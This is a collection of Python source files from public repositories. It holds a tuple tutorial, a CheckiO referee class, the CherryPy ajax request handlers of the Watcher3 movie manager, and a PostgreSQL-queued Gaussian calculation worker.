64ca497be5be743de5dd8bc59793c84cf3431d4f | 18c6f7ee10526583d8c65acc5ce04579a91fdeeb | /ch_01/18.tuple.py | cd04da0d3333b776026f7697790ddcee7dacff23 | []
| no_license | cloudsecuritylabs/pythonProject_1 | 97273634df25e306d0a2aed56fcf5c836d2ac33c | 8fc0d17b549d7195f8de46a227e5bb5d9f2ed4ed | refs/heads/master | 2023-07-22T16:06:14.550571 | 2021-08-24T03:09:00 | 2021-08-24T03:09:00 | 399,319,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | '''
Let's learn about tuple
'''
# tuple is immutable
my_tup = ('cat', 'dog', 'horse')
# NoneType
my_tup = []
food = None
if food is None:
print("Hey give me something") | [
"[email protected]"
]
| |
29aaf9830413dce680cb164b3a8dd63745dd68af | 1572b7dea50699582879b2b9fcedef12f2ef6704 | /verification/src/referee.py | 26e014f1e115a5887f39fd778b5563bcb03c8beb | []
| no_license | khanukov/checkio-empire-broken-report | 7106869fc504a2551fb7a1d412245a74c9401f64 | 64d68d89b99c2116c12fd1d579961ab699a760c6 | refs/heads/master | 2020-12-03T02:19:33.174438 | 2015-04-07T14:12:08 | 2015-04-07T14:12:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py | from checkio_referee import RefereeCodeGolf
from checkio_referee import covercodes
import settings_env
from tests import TESTS
# TODO Golf
class Referee(RefereeCodeGolf):
DEFAULT_MAX_CODE_LENGTH = 150
BASE_POINTS = 15
TESTS = TESTS
ENVIRONMENTS = settings_env.ENVIRONMENTS
DEFAULT_FUNCTION_NAME = "golf"
ENV_COVERCODE = {
"python_2": covercodes.py_2_str,
"python_3": None,
"javascript": None
}
| [
"[email protected]"
]
| |
ccee78a2b9646c3ed52024216b909a64eb921b0c | e4aab0a71dc5c047d8b1576380b16364e03e7c0d | /core/ajax.py | 0d38f835124b1bb6fdc17e253409ede47b76fd44 | [
"Apache-2.0"
]
| permissive | Joecastra/Watcher3 | 8ca66c44846030f0eb771d9d6ddeb9c37f637a4e | ce25d475f83ed36d6772f0cc35ef020d5e47c94b | refs/heads/master | 2021-01-19T11:05:55.454351 | 2017-04-10T20:17:24 | 2017-04-10T20:17:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,761 | py | import json
import logging
import os
import sys
import threading
import cherrypy
from base64 import b16encode
import core
from core import config, library, plugins, poster, searchresults, searcher, snatcher, sqldb, version
from core.providers import torrent, newznab
from core.downloaders import nzbget, sabnzbd, transmission, qbittorrent, deluge, rtorrent
from core.movieinfo import TMDB
from core.notification import Notification
from core.helpers import Conversions
from core.rss import predb
from templates import movie_info_popup, import_library, movie_status_popup, plugin_conf_popup, status
logging = logging.getLogger(__name__)
class Ajax(object):
''' These are all the methods that handle
ajax post/get requests from the browser.
Except in special circumstances, all should return a JSON string
since that is the only datatype sent over http
'''
def __init__(self):
self.tmdb = TMDB()
self.config = config.Config()
self.metadata = library.Metadata()
self.predb = predb.PreDB()
self.plugins = plugins.Plugins()
self.searcher = searcher.Searcher()
self.score = searchresults.Score()
self.sql = sqldb.SQL()
self.library = library
self.poster = poster.Poster()
self.snatcher = snatcher.Snatcher()
self.update = library.Status()
@cherrypy.expose
def search_tmdb(self, search_term):
''' Search tmdb for movies
:param search_term: str title and year of movie (Movie Title 2016)
Returns str json-encoded list of dicts that contain tmdb's data.
'''
results = self.tmdb.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return None
else:
return json.dumps(results)
@cherrypy.expose
def movie_info_popup(self, data):
''' Calls movie_info_popup to render html
:param imdbid: str imdb identification number (tt123456)
Returns str html content.
'''
mip = movie_info_popup.MovieInfoPopup()
return mip.html(data)
@cherrypy.expose
def movie_status_popup(self, imdbid):
''' Calls movie_status_popup to render html
:param imdbid: str imdb identification number (tt123456)
Returns str html content.
'''
msp = movie_status_popup.MovieStatusPopup()
return msp.html(imdbid)
@cherrypy.expose
def add_wanted_movie(self, data, full_metadata=False):
''' Adds movie to Wanted list.
:param data: str json.dumps(dict) of info to add to database.
full_metadata: bool if data is complete and ready for write
data MUST inlcude tmdb id as data['id']
Writes data to MOVIES table.
If full_metadata is False, searches tmdb for data['id'] and updates data
If Search on Add enabled,
searches for movie immediately in separate thread.
If Auto Grab enabled, will snatch movie if found.
Returns str json.dumps(dict) of status and message
'''
def thread_search_grab(data):
imdbid = data['imdbid']
title = data['title']
year = data['year']
quality = data['quality']
self.predb.check_one(data)
if core.CONFIG['Search']['searchafteradd']:
if self.searcher.search(imdbid, title, year, quality):
if core.CONFIG['Search']['autograb']:
self.snatcher.auto_grab(data)
response = {}
data = json.loads(data)
tmdbid = data['id']
if not full_metadata:
movie = self.tmdb._search_tmdbid(tmdbid)[0]
movie.update(data)
else:
movie = data
movie['quality'] = data.get('quality', 'Default')
movie['status'] = data.get('status', 'Wanted')
if self.sql.row_exists('MOVIES', imdbid=movie['imdbid']):
logging.info('{} already exists in library.'.format(movie['title']))
response['response'] = False
response['error'] = '{} already exists in library.'.format(movie['title'])
return json.dumps(response)
if movie.get('poster_path'):
poster_url = 'http://image.tmdb.org/t/p/w300{}'.format(movie['poster_path'])
else:
poster_url = '{}/static/images/missing_poster.jpg'.format(core.PROG_PATH)
movie = self.metadata.convert_to_db(movie)
if self.sql.write('MOVIES', movie):
t2 = threading.Thread(target=self.poster.save_poster, args=(movie['imdbid'], poster_url))
t2.start()
if movie['status'] != 'Disabled': # disable immediately grabbing new release for imports
t = threading.Thread(target=thread_search_grab, args=(movie,))
t.start()
response['response'] = True
response['message'] = '{} {} added to library.'.format(movie['title'], movie['year'])
self.plugins.added(movie['title'], movie['year'], movie['imdbid'], movie['quality'])
return json.dumps(response)
else:
response['response'] = False
response['error'] = 'Could not write to database. Check logs for more information.'
return json.dumps(response)
@cherrypy.expose
def add_wanted_imdbid(self, imdbid, quality='Default'):
''' Method to quckly add movie with just imdbid
:param imdbid: str imdb id #
Submits movie with base quality options
Generally just used for the api
Returns dict of success/fail with message.
Returns str json.dumps(dict)
'''
response = {}
movie = self.tmdb._search_imdbid(imdbid)
if not movie:
response['status'] = 'false'
response['message'] = '{} not found on TMDB.'.format(imdbid)
return response
else:
movie = movie[0]
movie['imdbid'] = imdbid
movie['quality'] = quality
return self.add_wanted_movie(json.dumps(movie))
@cherrypy.expose
def add_wanted_tmdbid(self, tmdbid, quality='Default'):
''' Method to quckly add movie with just tmdbid
:param imdbid: str imdb id #
Submits movie with base quality options
Generally just used for the api
Returns dict of success/fail with message.
Returns str json.dumps(dict)
'''
response = {}
data = self.tmdb._search_tmdbid(tmdbid)
if not data:
response['status'] = 'false'
response['message'] = '{} not found on TMDB.'.format(tmdbid)
return response
else:
data = data[0]
data['quality'] = quality
data['status'] = 'Wanted'
return self.add_wanted_movie(json.dumps(data))
@cherrypy.expose
def save_settings(self, data):
''' Saves settings to config file
:param data: dict of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
Fires off additional methods if neccesary.
Returns json.dumps(dict)
'''
# orig_config = dict(core.CONFIG)
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return json.dumps({'response': True})
try:
self.config.write_dict(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e: # noqa
logging.error('Writing config.', exc_info=True)
return json.dumps({'response': False, 'error': 'Unable to write to config file.'})
return json.dumps({'response': True})
@cherrypy.expose
def remove_movie(self, imdbid):
''' Removes movie
:param imdbid: str imdb identification number (tt123456)
Removes row from MOVIES, removes any entries in SEARCHRESULTS
In separate thread deletes poster image.
Returns srt 'error' or nothing on success
'''
t = threading.Thread(target=self.poster.remove_poster, args=(imdbid,))
t.start()
if self.sql.remove_movie(imdbid):
response = {'response': True}
else:
response = {'response': False}
return json.dumps(response)
@cherrypy.expose
def search(self, imdbid, title, year, quality):
''' Search indexers for specific movie.
:param imdbid: str imdb identification number (tt123456)
:param title: str movie title and year
Checks predb, then, if found, starts searching providers for movie.
Does not return
'''
self.searcher.search(imdbid, title, year, quality)
return
@cherrypy.expose
def manual_download(self, title, year, guid, kind):
''' Sends search result to downloader manually
:param guid: str download link for nzb/magnet/torrent file.
:param kind: str type of download (torrent, magnet, nzb)
Returns str json.dumps(dict) success/fail message
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
return json.dumps({'response': False, 'error': 'Link is NZB but no Usent downloader is enabled.'})
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return json.dumps({'response': False, 'error': 'Link is {} but no Torrent downloader is enabled.'.format(kind)})
data = dict(self.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return json.dumps(self.snatcher.snatch(data))
else:
return json.dumps({'response': False, 'error': 'Unable to get download information from the database. Check logs for more information.'})
@cherrypy.expose
def mark_bad(self, guid, imdbid):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
:param guid: srt guid to mark
Returns str json.dumps(dict)
'''
if self.update.mark_bad(guid, imdbid=imdbid):
response = {'response': True, 'message': 'Marked as Bad.'}
else:
response = {'response': False, 'error': 'Could not mark release as bad. Check logs for more information.'}
return json.dumps(response)
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
:param index: str or unicode index of notification to remove
'index' will be a type of string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
Notification.remove(int(index))
return
@cherrypy.expose
def update_check(self):
''' Manually check for updates
Returns str json.dumps(dict) from Version manager update_check()
'''
response = version.Version().manager.update_check()
return json.dumps(response)
@cherrypy.expose
def refresh_list(self, list, imdbid='', quality=''):
''' Re-renders html for Movies/Results list
:param list: str the html list id to be re-rendered
:param imdbid: str imdb identification number (tt123456) <optional>
Calls template file to re-render a list when modified in the database.
#result_list requires imdbid.
Returns str html content.
'''
if list == '#movie_list':
return status.Status.movie_list()
if list == '#result_list':
return movie_status_popup.MovieStatusPopup().result_list(imdbid, quality)
@cherrypy.expose
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
:param mode: str which downloader to test.
:param data: dict connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns str json.dumps dict:
{'status': 'false', 'message': 'this is a message'}
'''
response = {}
data = json.loads(data)
if mode == 'sabnzbd':
test = sabnzbd.Sabnzbd.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'nzbget':
test = nzbget.Nzbget.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'transmission':
test = transmission.Transmission.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'delugerpc':
test = deluge.DelugeRPC.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'delugeweb':
test = deluge.DelugeWeb.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'qbittorrent':
test = qbittorrent.QBittorrent.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'rtorrentscgi':
test = rtorrent.rTorrentSCGI.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
if mode == 'rtorrenthttp':
test = rtorrent.rTorrentHTTP.test_connection(data)
if test is True:
response['status'] = True
response['message'] = 'Connection successful.'
else:
response['status'] = False
response['error'] = test
return json.dumps(response)
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
:param mode: str command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
def server_restart():
cwd = os.getcwd()
cherrypy.engine.restart()
os.chdir(cwd) # again, for the daemon
return
def server_shutdown():
cherrypy.engine.stop()
cherrypy.engine.exit()
sys.exit(0)
if mode == 'restart':
logging.info('Restarting Server...')
threading.Timer(1, server_restart).start()
return
elif mode == 'shutdown':
logging.info('Shutting Down Server...')
threading.Timer(1, server_shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_now(self, mode):
''' Starts and executes update process.
:param mode: str 'set_true' or 'update_now'
The ajax response is a generator that will contain
only the success/fail message.
This is done so the message can be passed to the ajax
request in the browser while cherrypy restarts.
'''
response = self._update_now(mode)
for i in response:
return i
@cherrypy.expose
def _update_now(self, mode):
''' Starts and executes update process.
:param mode: str 'set_true' or 'update_now'
Helper for self.update_now()
If mode == set_true, sets core.UPDATING to True
This is done so if the user visits /update without setting true
they will be redirected back to status.
Yields 'true' back to browser
If mode == 'update_now', starts update process.
Yields 'true' or 'failed'. If true, restarts server.
'''
if mode == 'set_true':
core.UPDATING = True
yield json.dumps({'response': True})
if mode == 'update_now':
update_status = version.Version().manager.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False})
elif update_status is True:
yield json.dumps({'response': True})
logging.info('Respawning process...')
cherrypy.engine.stop()
python = sys.executable
os.execl(python, python, *sys.argv)
else:
return
@cherrypy.expose
def update_movie_options(self, quality, status, imdbid):
''' Updates quality settings for individual title
:param quality: str name of new quality
:param status: str status management state
:param imdbid: str imdb identification number
'''
logging.info('Updating quality profile to {} for {}.'.format(quality, imdbid))
if not self.sql.update('MOVIES', 'quality', quality, 'imdbid', imdbid):
return json.dumps({'response': False})
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not self.update.movie_status(imdbid):
return json.dumps({'response': False})
elif status == 'Finished':
if not self.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return json.dumps({'response': False})
return json.dumps({'response': True})
@cherrypy.expose
def get_log_text(self, logfile):
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
def indexer_test(self, indexer, apikey, mode):
if mode == 'newznab':
return json.dumps(newznab.NewzNab.test_connection(indexer, apikey))
elif mode == 'torznab':
return json.dumps(torrent.Torrent.test_connection(indexer, apikey))
else:
return json.dumps({'response': 'false', 'error': 'Invalid test mode.'})
@cherrypy.expose
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder: str folder to read config file from
conf: str filename of config file (ie 'my_plugin.conf')
Returns str html content.
'''
return plugin_conf_popup.PluginConfPopup.html(folder, conf)
@cherrypy.expose
def save_plugin_conf(self, folder, conf, data):
''' Calls plugin_conf_popup to render html
folder: str folder to store config file
conf: str filename of config file (ie 'my_plugin.conf')
data: str json data to store in conf file
Returns str json dumps dict of success/fail message
'''
data = json.loads(data)
conf_file = conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, conf)
response = {'response': True, 'message': 'Plugin settings saved'}
try:
with open(conf_file, 'w') as output:
json.dump(data, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return json.dumps(response)
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory: str directory to scan
minsize: str minimum file size in mb, coerced to int
resursive: str 'true' or 'false', coerced to bool
Removes all movies already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<knownn metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yeilds generator object of json objects
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = self.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
raise StopIteration()
library = [i['imdbid'] for i in self.sql.get_user_movies()]
files = files['files']
length = len(files)
for index, path in enumerate(files):
metadata = self.metadata.get_metadata(path)
metadata['size'] = os.path.getsize(path)
metadata['finished_file'] = path
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
progress = [index + 1, length]
if not metadata.get('imdbid'):
logging.info('IMDB unknown for import {}'.format(metadata['title']))
yield json.dumps({'response': 'incomplete', 'movie': metadata, 'progress': progress})
continue
if metadata['imdbid'] in library:
logging.info('Import {} already in library, ignoring.'.format(metadata['title']))
yield json.dumps({'response': 'in_library', 'movie': metadata, 'progress': progress})
continue
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
yield json.dumps({'response': 'incomplete', 'movie': metadata, 'progress': progress})
continue
else:
logging.info('All data found for import {}'.format(metadata['title']))
yield json.dumps({'response': 'complete', 'movie': metadata, 'progress': progress})
scan_library_directory._cp_config = {'response.stream': True}
@cherrypy.expose
def import_dir(self, movie_data, corrected_movies):
''' Imports list of movies in data
movie_data: list of dicts of movie info ready to import
corrected_movies: list of dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds generator object of json objects
'''
movie_data = json.loads(movie_data)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
for data in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(data['imdbid'])[0]
if tmdbdata:
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['imdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(data['imdbid'])})
progress += 1
for movie in movie_data:
if movie['imdbid']:
movie['status'] = 'Disabled'
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'IMDB ID invalid or missing.'})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True}
@cherrypy.expose
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir: str base path
move_dir: str child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Sends path to import_library template to generate html
Returns json dict {'new_path': '/path', 'html': '<li>...'}
'''
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['html'] = import_library.ImportLibrary.file_list(new_path)
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return json.dumps(response)
@cherrypy.expose
def update_metadata(self, imdbid):
tmdbid = self.sql.get_movie_details('imdbid', imdbid).get('tmdbid')
if not tmdbid:
tmdbid = self.tmdb._search_imdbid(imdbid)[0].get('id')
if not tmdbid:
return json.dumps({'response': False, 'error': 'Unable to find {} on TMDB.'.format(imdbid)})
movie = self.tmdb._search_tmdbid(tmdbid)[0]
target_poster = os.path.join(self.poster.poster_folder, '{}.jpg'.format(imdbid))
if movie['poster_path']:
poster_url = 'http://image.tmdb.org/t/p/w300{}'.format(movie['poster_path'])
else:
poster_url = '{}/static/images/missing_poster.jpg'.format(core.PROG_PATH)
if os.path.isfile(target_poster):
try:
os.remove(target_poster)
except Exception as e: #noqa
logging.warning('Unable to remove existing poster.', exc_info=True)
return json.dumps({'response': False, 'error': 'Unable to remove existing poster.'})
movie = self.metadata.convert_to_db(movie)
self.sql.update_multiple('MOVIES', movie, imdbid=imdbid)
self.poster.save_poster(imdbid, poster_url)
return json.dumps({'response': True, 'message': 'Metadata updated.'})
@cherrypy.expose
def change_quality_profile(self, profiles, imdbid=None):
''' Updates quality profile name
names: dict of profile names. k:v is currentname:newname
imdbid: str imdbid of movie to change <default None>
Changes movie quality profiles from k in names to v in names
If imdbid is passed will change only one movie, otherwise changes
all movies where profile == k
If imdbid is passed and names contains more than one k:v pair, submits changes
using v from the first dict entry. This is unreliable, so just submit one.
Executes two loops.
First changes qualities to temporary value.
Then changes tmp values to target values.
This way you can swap two names without them all becoming one.
'''
profiles = json.loads(profiles)
if imdbid:
q = profiles.values()[0]
if not self.sql.update('MOVIES', 'quality', q, 'imdbid', imdbid):
return json.dumps({'response': False, 'error': 'Unable to update {} to quality {}'.format(imdbid, q)})
else:
return json.dumps({'response': True, 'Message': '{} changed to {}'.format(imdbid, q)})
else:
tmp_qualities = {}
for k, v in profiles.items():
q = b16encode(v.encode('ascii')).decode('ascii')
if not self.sql.update('MOVIES', 'quality', q, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to change {} to temporary quality {}'.format(k, q)})
else:
tmp_qualities[q] = v
for k, v in tmp_qualities.items():
if not self.sql.update('MOVIES', 'quality', v, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to change temporary quality {} to {}'.format(k, v)})
if not self.sql.update('MOVIES', 'backlog', 0, 'quality', k):
return json.dumps({'response': False, 'error': 'Unable to set backlog flag. Manual backlog search required for affected titles.'})
return json.dumps({'response': True, 'message': 'Quality profiles updated.'})
@cherrypy.expose
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url: str url of kodi server
Calls Kodi import method to gather list.
Returns list of dicts of movies
'''
return json.dumps(library.ImportKodiLibrary.get_movies(url))
@cherrypy.expose
def import_kodi(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data: JSON list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds generator object of json objects
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
print(movies[0])
for movie in movies:
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])[0]
if not tmdb_data.get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(movie['imdbid'])})
progress += 1
continue
else:
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_kodi._cp_config = {'response.stream': True}
@cherrypy.expose
def get_plex_libraries(self, server, username, password):
if core.CONFIG['External']['plex_tokens'].get(server) is None:
token = library.ImportPlexLibrary.get_token(username, password)
if token is None:
return json.dumps({'response': False, 'error': 'Unable to get Plex token.'})
else:
core.CONFIG['External']['plex_tokens'][server] = token
self.config.dump(core.CONFIG)
else:
token = core.CONFIG['External']['plex_tokens'][server]
return json.dumps(library.ImportPlexLibrary.get_libraries(server, token))
@cherrypy.expose
def upload_plex_csv(self, file_input):
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e: #noqa
print(e)
return
if csv_text:
return json.dumps(library.ImportPlexLibrary.read_csv(csv_text))
return
@cherrypy.expose
def import_plex_csv(self, movie_data, corrected_movies):
''' Imports list of movies genrated by csv import
movie_data: list of dicts of movie info ready to import
corrected_movies: list of dicts of user-corrected movie info
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds generator object of json objects
'''
movie_data = json.loads(movie_data)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
for data in corrected_movies:
tmdbdata = self.tmdb._search_imdbid(data['imdbid'])[0]
if tmdbdata:
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['imdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'reason': 'Unable to find {} on TMDB.'.format(data['imdbid'])})
progress += 1
for movie in movie_data:
if movie['imdbid']:
movie['status'] = 'Disabled'
tmdb_data = self.tmdb._search_imdbid(movie['imdbid'])[0]
movie.update(tmdb_data)
response = json.loads(self.add_wanted_movie(json.dumps(movie)))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': 'IMDB ID invalid or missing.'})
progress += 1
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True}
@cherrypy.expose
def get_cp_movies(self, url, apikey):
url = '{}/api/{}/movie.list/'.format(url, apikey)
return json.dumps(library.ImportCPLibrary.get_movies(url))
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
for movie in wanted:
response = json.loads(self.add_wanted_movie(json.dumps(movie), full_metadata=True))
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
for movie in finished:
response = json.loads(self.add_wanted_movie(json.dumps(movie), full_metadata=True))
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'reason': response['error']})
progress += 1
continue
fake_results = self.score.score(fake_results, imported=True)
for i in success:
score = None
for r in fake_results:
if r['imdbid'] == i['imdbid']:
score = r['score']
break
if score:
self.sql.update('MOVIES', 'finished_score', score, 'imdbid', i['imdbid'])
self.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True}
| [
"[email protected]"
]
| |
cff553459a9e293fc45181572d58c0948c7b2fb5 | d6202e2fff0f0b22094a8bc383c3744cdcda6000 | /doc/gaussian_worker.py | 8947faa117d156fa87ff8bfc2d62fbcee2ef81ee | [
"MIT"
]
| permissive | pstjohn/bde | dc8e639527d281dade935141b06fbedc5958e4c8 | 5677af8dcbb992c7888746aa018302e6fb04e67d | refs/heads/master | 2022-07-16T02:17:59.151174 | 2022-06-30T19:52:01 | 2022-06-30T19:52:01 | 168,446,254 | 27 | 9 | MIT | 2021-09-07T16:20:45 | 2019-01-31T02:00:54 | Python | UTF-8 | Python | false | false | 2,626 | py | import psycopg2
import time
import logging
import random
import subprocess
import socket
dbparams = {
# In this example file, the database connection parameters (server, password, etc),
# has been removed. This file is mainly to show an example of how a SQL database
# was used to queue and dispatch Gaussian calculations.
}
from bde.gaussian import GaussianRunner
def run_optimization():
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
WITH cte AS (
SELECT id, smiles, type
FROM compound
WHERE status = 'not started'
ORDER BY id
LIMIT 1
FOR UPDATE
)
UPDATE compound SET status = 'in progress',
queued_at = CURRENT_TIMESTAMP,
node = %s
FROM cte
WHERE compound.id = cte.id
RETURNING compound.id, compound.smiles, compound.type;
""", (socket.gethostname(),))
cid, smiles, type_ = cur.fetchone()
conn.close()
try:
runner = GaussianRunner(smiles, cid, type_)
molstr, enthalpy, freeenergy, scfenergy, log = runner.process()
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE compound
SET status = 'finished',
mol = %s, enthalpy = %s,
freeenergy = %s, scfenergy= %s,
run_at = CURRENT_TIMESTAMP,
logfile = %s
WHERE id = %s;""",
(molstr, enthalpy, freeenergy, scfenergy, log, cid))
conn.close()
except Exception as ex:
with psycopg2.connect(**dbparams) as conn:
with conn.cursor() as cur:
cur.execute("""
UPDATE compound
SET status = 'error',
error = %s,
run_at = CURRENT_TIMESTAMP
WHERE id = %s;""", (str(ex), cid))
conn.close()
return cid
if __name__ == "__main__":
start_time = time.time()
# Add a random delay to avoid race conditions at the start of the job
time.sleep(random.uniform(0, 1*60))
while (time.time() - start_time) < (86400 * 9): # Time in days
try:
run_optimization()
except psycopg2.OperationalError:
time.sleep(5 + random.uniform(0, 60))
| [
"[email protected]"
]
| |
